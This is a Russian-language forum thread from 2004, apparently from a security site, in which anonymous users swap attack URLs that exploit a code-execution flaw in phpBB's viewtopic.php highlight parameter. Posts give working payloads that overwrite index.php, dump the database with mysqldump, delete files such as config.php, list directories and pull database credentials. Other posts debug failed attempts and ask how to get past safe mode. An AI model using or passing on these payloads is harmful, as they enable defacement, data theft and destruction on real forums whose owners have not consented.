SQL-инъекция и php инклудинг в phpBB

Гость Guest	#41 Это нравится:0 Да/0 Нет 21.11.2004 11:59:21 Clone! Budet )) esli y tebya web-server stoit.... ya dlya takih celei ego i pisal.... ydobnee prosto...

Clone

Guest

#42

Это нравится:0 Да/0 Нет

21.11.2004 12:49:38

Как делать SQL запросы?
Делаю так:
http://127.0.0.1/phpBB2/viewtopic.php?t=4&highlight=%2527.$p oster=%60$file%60.%2527&&file=%2527.SELECT%09phpbb_users%09F ROM%09name_of_forum%09WHERE%09login=%60admin_lamer%60%09AND% 09password=%60super_password%60.%2527

Но что-то не очень получается

%09 - это у нас пробел.
%60 - одинарная кавычка.
name_of_forum узнаем с помощью $dbname, т.е пишем запрос:
http://127.0.0.1/phpBB2/viewtopic.php?t=4&highlight=%2527.$p oster=$dbname.%2527

admin_lamer узнаем с помощью $dbuser, а super_password с помощью $dbpasswd

Помогите малость... [IMG]http://www.securitylab.ru/forum/smileys/smiley29.gif[/IMG]

Гость Guest	#43 Это нравится:0 Да/0 Нет 22.11.2004 01:24:31 man mysqldump или man pg_dump если стоит постресс... лучше сделать бекап всей таблицы чем выбирать отдельный запрос... а вообще почитай по вышеуказанной ссылке

Гость Guest	#44 Это нравится:0 Да/0 Нет 22.11.2004 01:32:47 Народ какую команду то вписывать? ктонить объяснит

Clone Guest	#45 Это нравится:0 Да/0 Нет 22.11.2004 11:59:20 Тоже юмор

гОсть Guest	#46 Это нравится:0 Да/0 Нет 22.11.2004 13:57:31 http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513

Гуест Guest	#47 Это нравится:0 Да/0 Нет 22.11.2004 15:52:12 блин все пробывал ... ниче не получаеться =( подскажите реальную иньекцию

][/\ам

Guest

#48

Это нравится:0 Да/0 Нет

22.11.2004 16:39:38

Parse error: parse error, unexpected '=' in /mnt/mirror/usr/home/sites/forsak/public_html/cgi-bin/forum/ viewtopic.php(1109) : regexp code on line 1

Fatal error: Failed evaluating code: preg_replace('#\b('\.$p|oster\=$dbname\.')\b#i', '\1', '>1. WEB дизайнеры 2. 3D художники<') in /mnt/mirror/usr/home/sites/forsak/public_html/cgi-bin/forum/ viewtopic.php on line 1109

и фсе

эксплоит не пашет, так как подключив модуль php_curl Апач орет что у него неизвестная ошибка и отрубается...

Гость из России Guest	#49 Это нравится:0 Да/0 Нет 22.11.2004 17:21:36 viewtopic.php?t=1&highlight=%2527.$poster=%60$ls%60.%2527&ls =echo%20"123"%20>%20../index.php Замена индекс пхп на своё

][/\aм Guest	#50 Это нравится:0 Да/0 Нет 22.11.2004 18:38:32 Темы, которую вы запросили, не существует. и нифига больше...

Clone

Guest

#51

Это нравится:0 Да/0 Нет

22.11.2004 19:56:22

Цитата

][/\ам пишет:
Parse error: parse error, unexpected '=' in /mnt/mirror/usr/home/sites/forsak/public_html/cgi-bin/forum/ viewtopic.php(1109) : regexp code on line 1

Fatal error: Failed evaluating code: preg_replace('#\b('\.$p|oster\=$dbname\.')\b#i', '\1', '>1. WEB дизайнеры 2. 3D художники<') in /mnt/mirror/usr/home/sites/forsak/public_html/cgi-bin/forum/ viewtopic.php on line 1109

и фсе

эксплоит не пашет, так как подключив модуль php_curl Апач орет что у него неизвестная ошибка и отрубается...

Та ты гонишь. У тебя в $poster пишется как $p|oster. И фсё!

гы Guest	#52 Это нравится:0 Да/0 Нет 22.11.2004 20:22:17 точна )

Clone Guest	#53 Это нравится:0 Да/0 Нет 22.11.2004 21:30:08 Я одно не доганяю. Зачем к статье прилагается эксплойт на php? Ведь всё можно делать в строке браузера?!

Гость

Guest

#54

Это нравится:0 Да/0 Нет

22.11.2004 21:44:28

мля ктонить дайте работающие комманды... нифига не получается..
Warning: shell_exec(): Cannot execute using backquotes in Safe Mode in /mnt/mirror/usr/home/sites/forsak/public_html/cgi-bin/forum/ viewtopic.php(1109) : regexp code on line 1
это чего?? обойти можно ?

Гость

Guest

#55

Это нравится:0 Да/0 Нет

22.11.2004 22:45:12

выводит дамп базы данных
вместо $USER, $PASS, $DBNAME подставить соответствующие значения
если при t=1 не существует темы поменять на другую цифру [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]

viewtopic.php?t=1&highlight=%2527.$poster=%60mysqldump%09mys qldump%09--user=$USER%09--password=$PASS%09$DBNAME%60.%2527

удаление файла вместо $file подставить имя файла например index.php или config.php
viewtopic.php?t=1&highlight=%2527.$poster=%60rm%09$file%60.% 2527

просмотреть каталог на наличие файлов, которые можно удалить [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG]
viewtopic.php?t=1&highlight=%2527.$poster=%60ls%09-la%60.%25 27

Hajmer

Guest

#56

Это нравится:0 Да/0 Нет

22.11.2004 23:10:53

Цитата
Гость пишет: viewtopic.php?t=6&highlight=%2527.$poster=%60mysqldump%09mys qldump%09--user=$USER%09--password=$PASS%09$DBNAME%60.%2527

Ничего подобного, при поставлении значений , выводит примерно следующие
Usage: mysqldump [OPTIONS] database [tables] OR mysqldump [OPTIONS] --databases [OPTIONS] DB1 [DB2 DB3...] OR mysqldump [OPTIONS] --all-databases [OPTIONS] For more options, use mysqldump --help )\b#i

Иначе говоря, хелп.

Гость Guest	#57 Это нравится:0 Да/0 Нет 23.11.2004 00:04:01 там один mysqldump лишний проскачил

Гость Guest	#58 Это нравится:0 Да/0 Нет 23.11.2004 01:33:50 Вот млин... поставил 2 недели назад 2.0.10... уже думаю на другой форум переезжать [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG]

Гость Guest	#59 Это нравится:0 Да/0 Нет 23.11.2004 01:56:58 А если %2527 игнорируется, есть другие варианты инъекции?

Hajmer

Guest

#60

Это нравится:0 Да/0 Нет

23.11.2004 05:14:00

Цитата
Гость пишет: там один mysqldump лишний проскачил

Заметил, результат тот же.

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?